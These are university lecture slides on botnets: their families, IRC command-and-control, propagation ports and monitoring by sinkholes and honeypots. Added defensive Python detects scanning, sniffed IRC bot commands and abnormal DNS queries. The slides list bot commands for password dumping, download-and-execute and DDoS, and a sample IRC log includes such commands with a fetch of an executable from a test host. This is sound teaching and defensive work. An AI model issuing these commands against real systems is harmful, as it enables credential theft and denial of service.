Page 1: CAP6135: Malware and Software Vulnerability Analysis   Botnets Cliff Zou Spring 2012

CAP6135: Malware and Software Vulnerability Analysis

Botnets

Cliff Zou

Spring 2012

Page 2: Acknowledgement

This lecture uses some contents from the lecture notes from:
  Dr. Dawn Song, CS161: Computer Security
  Richard Wang, SophosLabs: The Development of Botnets
  Randy Marchany, VA Tech IT Security Lab: Botnets

Page 3: Botnets

Collection of compromised hosts
  Spread like worms and viruses
  Once installed, respond to remote commands
A network of 'bots'
  robot: an automatic machine that can be programmed to perform specific tasks
Also known as 'zombies'

Page 4:

Platform for many attacks
  Spam forwarding (70% of all spam?)
  Click fraud
  Keystroke logging
  Distributed denial of service attacks
Serious problem
  Top concern of banks, online merchants
  Vint Cerf (2007): up to ¼ of hosts connected to the Internet may be bots

Page 5: What are botnets used for?

Page 6: IRC (Internet Relay Chat) based Control

Page 7: IRC (Internet Relay Chat) based Control

Page 8: Why IRC?

IRC servers are:
  freely available
  easy to manage
  easy to subvert
Attackers have experience with IRC
IRC bots usually have a way to remotely upgrade victims with new payloads, to stay ahead of security efforts

Page 9: How bad is the problem?

Symantec identified a 400K-node botnet
A network administrator in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections
  Phatbot harvests MyDoom- and Bagle-infected machines
Researchers at Georgia Tech monitored thousands of botnets

Page 10: Spreading Problem

Spreading mechanism is a leading cause of background noise
Ports 445, 135, 139, 137 (SMB over TCP, MS-RPC endpoint mapper, NetBIOS session service, NetBIOS name service) accounted for 80% of traffic captured by the German Honeynet Project
Other ports:
  2745: Bagle backdoor
  3127: MyDoom backdoor
  3410: Optix trojan backdoor
  5000: UPnP vulnerability
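The scanning that produces this background noise has a network-visible signature: one source contacting many distinct destinations on the same propagation port in a short time, unlike a client that talks to a few file servers repeatedly. The Python below is an added example, not code from the lecture or from the Honeynet Project; the flow-record format, the 60-second window, the 20-destination threshold and the sample capture are all constructed for illustration.

```python
"""Horizontal-scan detection over connection attempts to bot propagation ports.

Added example, not part of the lecture: given flow records, flag a source that
contacts many distinct destinations on one of the ports the slide names
(445, 135, 139, 137) within a short window. The record format, window and
threshold are assumptions for illustration.
"""
from collections import Counter, defaultdict
from typing import NamedTuple

# Ports that dominated the German Honeynet Project's background noise:
# SMB over TCP, MS-RPC endpoint mapper, NetBIOS session, NetBIOS name service.
PROPAGATION_PORTS = {445, 135, 139, 137}
# Secondary ports from the slide: backdoors left behind by earlier malware.
BACKDOOR_PORTS = {2745: "Bagle backdoor", 3127: "MyDoom backdoor",
                  3410: "Optix trojan backdoor", 5000: "UPnP"}


class Flow(NamedTuple):
    ts: float       # seconds since capture start
    src: str
    dst: str
    dport: int


def parse_flow(line):
    """Parse a constructed record: '<ts> <src_ip> <dst_ip> <dst_port>'."""
    ts, src, dst, dport = line.split()
    return Flow(float(ts), src, dst, int(dport))


def propagation_port_share(flows):
    """Fraction of flows aimed at the four propagation ports (the slide's 80%)."""
    hits = sum(1 for f in flows if f.dport in PROPAGATION_PORTS)
    return hits / len(flows) if flows else 0.0


def detect_horizontal_scans(flows, window=60.0, min_targets=20):
    """Return {src_ip: {dport, ...}} for sources that reached at least
    min_targets distinct destinations on a propagation port within any
    window-second span. Repeated connections to the same few hosts never
    trigger, because only distinct destinations are counted."""
    events = defaultdict(list)                  # (src, dport) -> [(ts, dst)]
    for f in flows:
        if f.dport in PROPAGATION_PORTS:
            events[(f.src, f.dport)].append((f.ts, f.dst))
    scanners = defaultdict(set)
    for (src, dport), seq in events.items():
        seq.sort()
        in_window = Counter()                   # dst -> hits inside the window
        lo = 0
        for ts, dst in seq:
            in_window[dst] += 1
            while ts - seq[lo][0] > window:     # slide the window forward
                old = seq[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= min_targets:
                scanners[src].add(dport)
                break
    return dict(scanners)


def sample_flows():
    """Constructed capture (not real honeynet data)."""
    lines = []
    for i in range(30):                         # scanner: a new host every second
        lines.append(f"{1000 + i} 10.0.0.5 10.1.0.{i + 1} 445")
    for i in range(30):                         # legit client: 3 file servers, repeatedly
        lines.append(f"{1000 + i} 10.0.0.9 10.2.0.{i % 3 + 1} 445")
    for i in range(10):                         # unrelated web traffic
        lines.append(f"{1000 + i} 10.0.0.7 198.51.100.80 80")
    return [parse_flow(line) for line in lines]


if __name__ == "__main__":
    flows = sample_flows()
    print(f"propagation-port share: {propagation_port_share(flows):.0%}")
    for src, ports in detect_horizontal_scans(flows).items():
        print(f"scanner {src} on ports {sorted(ports)}")
```

Counting distinct destinations rather than raw connection attempts is what keeps the legitimate SMB client out of the result: it produces as many port-445 flows as the scanner but only ever reaches three hosts. The window bounds memory and makes a slow scan that spreads 20 hosts over an hour invisible at the default settings, which is the trade-off a real sensor tunes.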

Page 11: Most commonly used Bot families

Agobot
SDBot
SpyBot
GT Bot

Page 12: Agobot

Most sophisticated: 20,000 lines of C/C++ code
IRC-based command/control
Large collection of target exploits
Capable of many DoS attack types
Shell encoding/polymorphic obfuscation
Traffic sniffers/key logging
Defend/fortify compromised system
Ability to frustrate disassembly

Page 13: SDBot

Simpler than Agobot: 2,000 lines of C code
Non-malicious at base
Utilizes IRC-based command/control
Easily extended for malicious purposes:
  Scanning
  DoS attacks
  Sniffers
  Information harvesting
  Encryption

Page 14: SpyBot

<3,000 lines of C code
Possibly evolved from SDBot
Similar command/control engine
No attempts to hide malicious purposes

Page 15: GT Bot

Functions based on mIRC scripting capabilities
HideWindow program hides bot on local system
  Basic rootkit function
Port scanning, DoS attacks, exploits for RPC and NetBIOS

Page 16:

Variance in codebase size, structure, complexity, implementation
Convergence in set of functions
  Possibility for defense systems effective across bot families
Bot families extensible
  Agobot likely to become dominant

Page 17: Control

All of the above use IRC for command/control
Disrupt IRC, disable bots
  Sniff IRC traffic for commands
  Shut down channels used for botnets
  IRC operators play central role in stopping botnet traffic
But a botnet could use its own IRC server
  Automated traffic identification required
Future botnets may move away from IRC
  Move to P2P communication
  Traffic fingerprinting still useful for identification

Page 18: Host control

Fortify system against other malicious attacks
Disable anti-virus software
Harvest sensitive information
  PayPal, software keys, etc.
  Economic incentives for botnets
Stresses need to patch/protect systems prior to attack
Stronger protection boundaries required across applications in OSes

Page 19: Example Botnet Commands

Connection:
  CLIENT: PASS <password>
  HOST: (if error, disconnect)
  CLIENT: NICK <nick>
  HOST: NICKERROR | CONNECTED
Pass hierarchy info:
  BOTINFO <nick> <connected_to> <priority>
  BOTQUIT <nick>

Page 20: Example Botnet Commands

IRC Commands:
  CHANJOIN <tag> <channel>
  CHANPART <tag> <channel>
  CHANOP <tag> <channel>
  CHANKICK <tag> <channel>
  CHANBANNED <tag> <channel>
  CHANPRIORITY <ircnet> <channel> <LOW/NORMAL/HIGH>

Page 21: Example Botnet Commands

pstore: display all usernames/passwords stored in browsers of infected systems
bot.execute: run executable on remote system
bot.open: read file on remote computer
bot.command: run command with system()

Page 22: Example Botnet Commands

http.execute: download and execute file through HTTP
ftp.execute: same, through FTP
ddos.udpflood
ddos.synflood
ddos.phaticmp
redirect.http
redirect.socks
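Page 17's "sniff IRC traffic for commands" and the command names on Pages 21-22 combine naturally into a detector. The Python below is an added example, not code from the lecture or from any bot family: it parses raw IRC lines in RFC 1459 framing and flags PRIVMSG, NOTICE, TOPIC and RPL_TOPIC (332) text that starts with one of the slides' Agobot-style command names. The sample log, the #c0ntr0l channel, the hosts and the leading-dot command prefix are assumptions for illustration; real families differ in prefix and spelling.

```python
"""Spotting botnet commands in sniffed IRC traffic.

Added example, not from the lecture: parse raw IRC protocol lines (RFC 1459
framing) and flag channel messages or topics that carry the Agobot-style
commands listed on the slides. The sample log, channel/host names and the
leading-dot command prefix are constructed for illustration.
"""
import re
from typing import NamedTuple, Optional

# Command names from the slides (lowercased). Extend for other families.
KNOWN_COMMANDS = {
    "pstore", "bot.execute", "bot.open", "bot.command",
    "http.execute", "ftp.execute",
    "ddos.udpflood", "ddos.synflood", "ddos.phaticmp",
    "redirect.http", "redirect.socks",
}
# Characters a botmaster prefixes commands with (assumption).
COMMAND_PREFIXES = ".!~"
# IRC verbs whose text can carry a command: channel messages, topic changes,
# and the RPL_TOPIC (332) reply a bot receives when it joins the channel.
CARRIERS = {"PRIVMSG", "NOTICE", "TOPIC", "332"}

IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?"               # optional :nick!user@host or :server
    r"(?P<command>\S+)"                      # verb or 3-digit numeric
    r"(?P<params>(?: [^:\s]\S*)*)"           # middle params (no leading ':')
    r"(?: :(?P<trailing>.*))?$"              # trailing param after ' :'
)


class IrcMessage(NamedTuple):
    prefix: Optional[str]
    command: str
    params: list
    trailing: Optional[str]


class Detection(NamedTuple):
    sender: str
    channel: str
    command: str
    args: list


def parse_irc_line(line):
    """Split one raw IRC line into prefix, command, params and trailing text."""
    m = IRC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return IrcMessage(m["prefix"], m["command"].upper(),
                      m["params"].split(), m["trailing"])


def extract_command(text):
    """Return (command, args) if text starts with a known bot command, else None."""
    tokens = text.strip().split()
    if not tokens:
        return None
    name = tokens[0].lstrip(COMMAND_PREFIXES).lower()
    if name in KNOWN_COMMANDS:
        return name, tokens[1:]
    return None


def sniff_irc_commands(lines):
    """Run every line through the parser and collect bot commands found in
    carrier messages, with who sent them and on which channel."""
    found = []
    for line in lines:
        msg = parse_irc_line(line)
        if msg is None or msg.command not in CARRIERS or msg.trailing is None:
            continue
        hit = extract_command(msg.trailing)
        if hit is None:
            continue
        # PRIVMSG/NOTICE/TOPIC: the channel is the only param;
        # 332: params are <nick> <channel>, so the channel is last either way.
        channel = msg.params[-1] if msg.params else ""
        sender = (msg.prefix or "").split("!")[0]
        found.append(Detection(sender, channel, hit[0], hit[1]))
    return found


SAMPLE_IRC_LOG = [   # constructed, not a real capture
    "PING :irc.example.net",
    ":bot-7f3a!x@203.0.113.9 JOIN :#c0ntr0l",
    ":irc.example.net 332 bot-7f3a #c0ntr0l :.http.execute http://203.0.113.5/upd.exe",
    ":alice!a@198.51.100.4 PRIVMSG #chat :hello everyone",
    ":master!m@198.51.100.77 PRIVMSG #c0ntr0l :.ddos.udpflood 203.0.113.7 80 120",
    ":master!m@198.51.100.77 PRIVMSG #c0ntr0l :.pstore",
    ":master!m@198.51.100.77 TOPIC #c0ntr0l :.bot.command ipconfig /all",
]

if __name__ == "__main__":
    for d in sniff_irc_commands(SAMPLE_IRC_LOG):
        print(f"{d.channel} <{d.sender}> {d.command} {' '.join(d.args)}")
```

Including the 332 topic reply matters because many IRC bots take their standing orders from the channel topic rather than from a live message: a bot that joins an hour after the botmaster left still picks up the http.execute line above, and a sniffer watching only PRIVMSG would miss it.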

Page 23: Current Botnet Control Architecture

[Diagram: botmaster, C&C servers, bots]
More than one C&C server
Spread all around the world

Page 24: Botnet Monitor: Gatech KarstNet

A lot of bots use a Dyn-DNS name to find the C&C
[Diagram: attacker, C&C servers (cc1.com), bots, KarstNet sinkhole]
Detect cc1.com by its abnormal DNS queries
KarstNet informs the DNS provider of cc1.com
DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
All/most bots attempt to connect to the sinkhole
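The KarstNet flow on this slide (detect a C&C name by its abnormal DNS queries, then have the provider answer it with the sinkhole) can be sketched in code. The Python below is an added example, not the Georgia Tech system or any part of the lecture: a resolver operator keeps hourly counts of distinct clients per name, flags a name whose population jumps far above its own history (or a brand-new name that is immediately popular), and answers flagged names with a sinkhole address. The log format, the thresholds, the cc1.example/cc2.example names standing in for the slide's cc1.com, and every address are constructed for illustration.

```python
"""DNS-side botnet detection and sinkholing in the KarstNet style.

Added example, not part of the lecture or of the Georgia Tech system: a
dynamic-DNS provider tracks per-domain hourly counts of distinct querying
clients; a domain whose count jumps far above its own baseline (or a new name
that is instantly popular) is treated as a suspected C&C name and resolved to
the sinkhole. Log format, thresholds, names and addresses are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev

SINKHOLE_IP = "192.0.2.53"          # stands in for the Gatech sinkhole (TEST-NET-1)


def parse_query(line):
    """Parse a constructed record: '<hour> <client_ip> <qname>'."""
    hour, client, qname = line.split()
    return int(hour), client, qname.lower().rstrip(".")


def clients_by_domain_hour(lines):
    """Return {qname: {hour: set(client_ips)}}."""
    table = defaultdict(lambda: defaultdict(set))
    for hour, client, qname in map(parse_query, lines):
        table[qname][hour].add(client)
    return table


def flag_abnormal_domains(lines, current_hour, k=3.0, ratio=3.0, min_clients=20):
    """Return {qname: distinct_clients} for domains whose client population in
    current_hour is abnormal relative to their own earlier hours. A name with
    no history is flagged when it is immediately queried by many clients."""
    table = clients_by_domain_hour(lines)
    flagged = {}
    for qname, hours in table.items():
        now = len(hours.get(current_hour, ()))
        if now < min_clients:
            continue                                  # too small to matter
        history = [len(c) for h, c in hours.items() if h < current_hour]
        if not history:
            flagged[qname] = now                      # new name, instantly popular
            continue
        mu = mean(history)
        # Both a statistical and a multiplicative bound: a perfectly steady
        # baseline has zero deviation, so the ratio test stops small drifts
        # on a popular site from being flagged.
        threshold = max(mu + k * pstdev(history), ratio * mu)
        if now > threshold:
            flagged[qname] = now
    return flagged


def resolve(qname, zone, flagged):
    """Answer as the provider would after KarstNet's notice: suspected C&C
    names map to the sinkhole, everything else to the real record."""
    qname = qname.lower().rstrip(".")
    if qname in flagged:
        return SINKHOLE_IP
    return zone.get(qname)


def sample_query_log():
    """Constructed query log: 24 quiet hours, then hour 24 when a botnet wakes."""
    lines = []
    for h in range(24):
        for i in range(150 + h % 5):                  # steady popular site
            lines.append(f"{h} 198.51.100.{i} www.example.org")
        for i in range(3):                            # dormant C&C name
            lines.append(f"{h} 203.0.113.{i} cc1.example")
    for i in range(155):
        lines.append(f"24 198.51.100.{i} www.example.org")
    for i in range(200):                              # bots phoning home
        lines.append(f"24 10.0.{i}.7 cc1.example")
    for i in range(40):                               # fresh C&C name, no history
        lines.append(f"24 10.9.{i}.7 cc2.example")
    for i in range(5):                                # new but small: ignored
        lines.append(f"24 172.16.0.{i} blog.example")
    return lines


ZONE = {"www.example.org": "198.51.100.10", "cc1.example": "203.0.113.200",
        "cc2.example": "203.0.113.201", "blog.example": "203.0.113.202"}

if __name__ == "__main__":
    flagged = flag_abnormal_domains(sample_query_log(), current_hour=24)
    for name, n in sorted(flagged.items()):
        print(f"suspect {name}: {n} distinct clients -> {resolve(name, ZONE, flagged)}")
```

Once the name resolves to the sinkhole, the bots' own connection attempts become the census the slide describes: every source address that reaches the sinkhole is an infected host, which is why the hijack yields a population estimate that passive DNS counting alone cannot.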

Page 25: Botnet Monitor: Honeypot Spy

Security researchers set up honeypots
  Honeypots: deliberately set up vulnerable machines
  When compromised, put the malware's behaviors under close monitoring
  Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
When a compromised honeypot joins a botnet:
  Passive monitoring: log all network traffic
  Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
Representative research paper:
  Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis. A multifaceted approach to understanding the botnet phenomenon. 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006.

Page 26: The Future Generation of Botnets

Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques